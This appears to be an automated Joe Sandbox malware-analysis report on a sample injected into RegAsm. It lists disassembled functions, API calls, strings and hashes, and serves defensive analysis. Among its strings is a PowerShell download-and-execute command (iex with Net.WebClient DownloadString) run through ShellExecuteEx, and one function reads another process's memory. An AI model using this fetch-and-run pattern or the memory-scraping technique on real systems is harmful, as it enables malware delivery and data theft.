Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: \2l$ew0l
API String ID: 3168844106-3077305395
Opcode ID: 5425273c56d7f4fb5c2d0a24f91fe7aafba5bd7755b98e27adf92813b5ce6130
Instruction ID: d8efd41f79ae30225d58b607541e9f7b1508caea8c01f31eddffc14be4f959ea
Opcode Fuzzy Hash: 5425273c56d7f4fb5c2d0a24f91fe7aafba5bd7755b98e27adf92813b5ce6130
Instruction Fuzzy Hash: C5214732701B1A8FCF14CFB9C846A26B3B9FB85719725062DDDA587F40D739E8028B81

Function 6C2ECA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6C2ECA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2ECA69
Sleep.KERNEL32 ref: 6C2ECADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2ECAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2ECAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C2ECB19

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: e5b1ebb795b25f36fc7dfea1d7469ba2294b028b77a1d23f25018aad844537d1
Instruction ID: a7a3fbe437eca5a21b435fa6d43aa5d3ffa4a2e113767ec0f1b3400ff4561606
Opcode Fuzzy Hash: e5b1ebb795b25f36fc7dfea1d7469ba2294b028b77a1d23f25018aad844537d1
Instruction Fuzzy Hash: DD213A31B0464C8BC709EF78984156BFBBDFFC6745F808B28EC46A6644EF7095888781

Function 6C2FC810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C2FC82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C2FC842

Part of subcall function 6C2FCAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C31B5EB,00000000), ref: 6C2FCB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C2FC863
std::_Facet_Register.LIBCPMT ref: 6C2FC875

Part of subcall function 6C2DB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C31B636,?), ref: 6C2DB143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C2FC89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2FC8BC

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: b8885d21e3b801ecbaa1be04ba40b6f89c56d04437de2970bbeef1a047cc0d9e
Instruction ID: 94c0f496c0406471b6a8bb01c9a15d3486dd5ac271e0f540ff488deb8e8d70b3
Opcode Fuzzy Hash: b8885d21e3b801ecbaa1be04ba40b6f89c56d04437de2970bbeef1a047cc0d9e
Instruction Fuzzy Hash: 6811B671B0020D9BCF00DFA4C8998EEBB78EF89759F14012DE91797340DB34A909CB91

Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C9EA

Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF

__amsg_exit.LIBCMT ref: 0041CA0A
__lock.LIBCMT ref: 0041CA1A
InterlockedDecrement.KERNEL32(?), ref: 0041CA37
free.MSVCRT ref: 0041CA4A
InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 8fe1d07e46c7f7a05b9aade772f191e19f6fe2cab31bcbc29ba7bdc60f9379df
Instruction ID: 83df0cd24f2ef528265bdd767f82c36d0b02d0b672a998c6c347af455cc5eb0e
Opcode Fuzzy Hash: 8fe1d07e46c7f7a05b9aade772f191e19f6fe2cab31bcbc29ba7bdc60f9379df
Instruction Fuzzy Hash: DF01C431A817299BC722EB669C857DE77A0BF04794F01811BE80467390C72C69D2CBDD

Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00416F1F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D

Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3

Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8

Strings

@, xrefs: 00416FA6

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5

Function 004069B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19

Strings

*n@, xrefs: 00406B28, 00406BB6, 00406BBB, 00406B65
*n@, xrefs: 004069BD, 004069C9, 004069DC, 004069E5, 00406A09, 00406A32, 00406A35, 00406AEF, 00406B01, 00406B0D, 00406B16, 00406B93, 00406B49, 00406A4A, 00406A6D, 00406A79, 00406AA1, 00406AD1, 00406AE3, 00406AAD, 00406ABA, 00406A56

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: *n@$*n@
API String ID: 1029625771-193229609
Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95

Function 6C2F0180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C2F0270
GetCurrentThreadId.KERNEL32 ref: 6C2F02E9
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2F02F6
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2F033A

Strings

about:blank, xrefs: 6C2F020F

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: 9346148c87bf610d0b6da42aa9992c83f0db0f3185180c2a2846243115c028bb
Instruction ID: a971c7e27402c1f283839c73b8b10348e95173f9f56c661f671911044eaf8bd5
Opcode Fuzzy Hash: 9346148c87bf610d0b6da42aa9992c83f0db0f3185180c2a2846243115c028bb
Instruction Fuzzy Hash: B1518D75A0021E8FCB00DF58C880A9AF7F5FF49328F654619DC2AA7B41D735B946CBA1

Function 6C2EE100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EE12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C2EE084,00000000), ref: 6C2EE137

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C2EE196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C2EE1E9

Part of subcall function 6C2E99A0: GetCurrentThreadId.KERNEL32 ref: 6C2E99C1
Part of subcall function 6C2E99A0: AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2E99CE
Part of subcall function 6C2E99A0: ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2E99F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6C2EE13F

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: bcff1d733436cd5a7622d32be48f72910b3355a50a27d6b9fd623d933cf9b001
Instruction ID: 2857eeba6ea030e279c24497a4989c0184f4e3b6338a8c7f6afc747e231742f4
Opcode Fuzzy Hash: bcff1d733436cd5a7622d32be48f72910b3355a50a27d6b9fd623d933cf9b001
Instruction Fuzzy Hash: 303114B5A047099FD704DF6884403AAF7E5AFCA24CF50842EEC496BF41DB748909CB92

Function 6C2DF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C2DF480

Part of subcall function 6C2AF100: LoadLibraryW.KERNEL32(shell32,?,6C31D020), ref: 6C2AF122
Part of subcall function 6C2AF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C2AF132

CloseHandle.KERNEL32(00000000), ref: 6C2DF555

Part of subcall function 6C2B14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C2B1248,6C2B1248,?), ref: 6C2B14C9
Part of subcall function 6C2B14B0: memcpy.VCRUNTIME140(?,6C2B1248,00000000,?,6C2B1248,?), ref: 6C2B14EF

Part of subcall function 6C2AEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C2AEEE3

CreateFileW.KERNEL32 ref: 6C2DF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C2DF523

Strings

\oleacc.dll, xrefs: 6C2DF4CB

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: e5fbdf73301d67f4f8dbb7072fa2cab0010f74dee752fa0d38fc2a5cdfa8b99d
Instruction ID: 8878ba8219e6ebf9a675cdd85def5114a0adc036bc17455220fb0565bf30eca7
Opcode Fuzzy Hash: e5fbdf73301d67f4f8dbb7072fa2cab0010f74dee752fa0d38fc2a5cdfa8b99d
Instruction Fuzzy Hash: FC41FF306183159FE720DF68C884B9BB3F8AF94319F100A1CFD9197650EB34E949CB92

Function 6C2E0210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2E0222
moz_xmalloc.MOZGLUE(0000000C), ref: 6C2E0231

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2E028B
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C2E02F7

Strings

@, xrefs: 6C2E02D8

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: 0f979e006e47fa2328456b7f0ebedb8e536295f533c67fba579ae83ab214292b
Instruction ID: bcbdacda05c3dfad6cc03d273d25452cb81c86352dae463b51690c1a858bdcde
Opcode Fuzzy Hash: 0f979e006e47fa2328456b7f0ebedb8e536295f533c67fba579ae83ab214292b
Instruction Fuzzy Hash: 2231DFB1A006558FEB54CF58C880A16B7E1FF48718B14852DED5AEBB40DB31EC02CB91

Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

ShellExecuteEx.SHELL32(0000003C), ref: 00412D85

Strings

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
<, xrefs: 00412D39
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
')", xrefs: 00412CB3

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 7f128ac8f9bb9458abef97919d6b2e581af989fbd2c846308f4a6e5cacd24915
Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
Opcode Fuzzy Hash: 7f128ac8f9bb9458abef97919d6b2e581af989fbd2c846308f4a6e5cacd24915
Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9

Function 6C2EE020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EE047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EE04F

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2EE09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2EE0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6C2EE057

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: 4685d3a67d85b506202250cad04bf50c600124b7a1d59d623e05e043eb120fb2
